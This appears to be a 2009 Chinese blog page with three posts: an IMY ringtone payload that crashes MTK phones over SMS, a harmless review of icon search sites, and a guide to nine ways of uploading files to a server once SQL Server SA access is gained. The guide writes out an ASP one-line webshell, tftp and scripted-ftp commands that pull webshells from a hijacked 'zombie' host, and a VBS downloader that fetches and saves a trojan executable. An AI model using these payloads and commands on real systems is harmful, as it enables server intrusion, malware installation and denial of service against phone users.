COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+"@9999999999999999999999999"&gt;"++"@9999999999999999999999999)"

注意:“@”后面的数字越大，重复次数越多

预防MTK手机漏洞：
　　MTK所有支持imy铃声的手机都会中招。至于预防，我想这是很难的，毕竟只要触发就会中招，只能是看到类似的短信立即关闭，不继续翻阅从而避免激活imy文件代码。当然，这只是相对的，如果对方发送的短信是先插入的imy文件再写文字的话，那就不可避免了。更好的方法，不要打开本地接受到的短信，用飞信接受对方发来的短信信息。

文章地址:http://www.nodll.com/2009/12/21/mtkbug/Pray.html

4款ICON图标搜索网站

Pray — Fri, 18 Dec 2009 17:09:57 +0800

Iconfinder

这是其中一个最好的图标搜索引擎，在它们的数据库里面存储了超过1000多个图标资源，你可以输入一个你需要的相关的图标关键词进行搜索。其Ajax的导航，使一件轻而易举的找到新的图标。每个图标在搜索结果中进行，其标记，下载链接和许可证信息。无需翻阅页面得到下载图标，击中下载图标，该图标将被下载。大部分的图标漂亮，可以用来在现代或Web 2.0的设计。

Iconlet

另一个图标搜索引擎，它也运作良好。在这里你会得到很多更多的图标下载，但结果并不很清楚分类，你会发现图标分组无关的某些关键字。图标看起来很老式，而不是漂亮。列出的许可信息不同的网页。

Iconlook

又一款图标搜索引擎的加入者，列出了许多图标。大部分的图标都很不错，可用于现代的网页设计。图标搜索结果中显示的图标大小。

icons-search

图标搜索是一个图标的搜索引擎，帮助您查找质量图标因特网上查到。你可以找到图标用于Windows Vista和Windows XP ， Macintosh上， Linux的图标用于桌面电脑，软件，网站，移动，演示，在大小从16×16到256×256在PNG格式和大小从16×16到128×128 ，在保险公司条例格式。图标的版权均属于各自所有权人所有。使用前的图标（或者非商业或商业）您必须检查许可证的图标提供商。它通常可在图标供应商的网站或在图标存档。

文章地址:http://www.nodll.com/2009/12/18/4icon/Pray.html

了解SA权限九种上传方法

Pray — Wed, 09 Dec 2009 13:24:45 +0800

SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家能分享出来.

1、NBSI的命令方法:写入一句话木SHELL,命令如下:

1	echo ^<25%execute request("#")25%^> >d:\web\mm.asp

这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop “服务名”可以停掉服务。

2、NBSI3.0自带文件上传功能，也可以使用。缺点速度慢。建议上传短小的WEBSHELL。

3、把一句话木马与入数据库，然后利用NBSI数据库差异备份功能。

4、如网站有论坛且开放上传附件功能，可直接在论坛上传文件（把WEBSHELL改成可能上传的文件类型，如JPG，GIF）

5、利用NBSI等注入工具，浏览网站数据库连接文件（前提数据库和WEB在一台机器上，可利用IPCNFIG /ALL命令判断）找出SA的连接密码。利用MSSQL2000自带的事件查询分析器，连数库机器，通过浏览数据库找出后台密码，如果是MD5可利用Update语句进行更改也可利用Insert加入一新用户，不用在爆破MD5，进入后台，寻找上传WEBSHELL方法。

6、tftp命令法： TFTP [-i] host [GET | PUT] source [destination] 首先在自己的机器或已经控制的肉鸡上开TFTP服务，工具：TFTP32.EXE不错。比如：肉鸡IP：192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令:

1	tftp -i 192.168.1.1 get webshell.asp d:\web\webshell.asp

如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp

7、ftp方法:前提是有一个可访问的外网FTP空间().命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txt

echo open www.ftp.com>ftp.txt //连接FTP
echo username>>ftp.txt       //输入用户名
echo password>>ftp.txt       //输入密码
echo get webshell.asp d:\web\webshell.asp>>ftp.txt //执行下载命令
echo bye>>ftp.txt             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令

8、vbs脚本方法:
利用ECHO命令写入文件: get.vbs,内容如下:

On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

然后命令行下执行:cscript get.vbs http://ip/muma.exe c:\muma.exe

9、start命令法，此方法不常用，但也是一种方法，
start http://ip/a.html这候a.html文件以及它包括的图片会保存在机器的，如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中。可以利用dir /s a*.jpg进行搜索。如搜索到，可以利用COPY命令复制出来。

文章地址:http://www.nodll.com/2009/12/09/sa9/Pray.html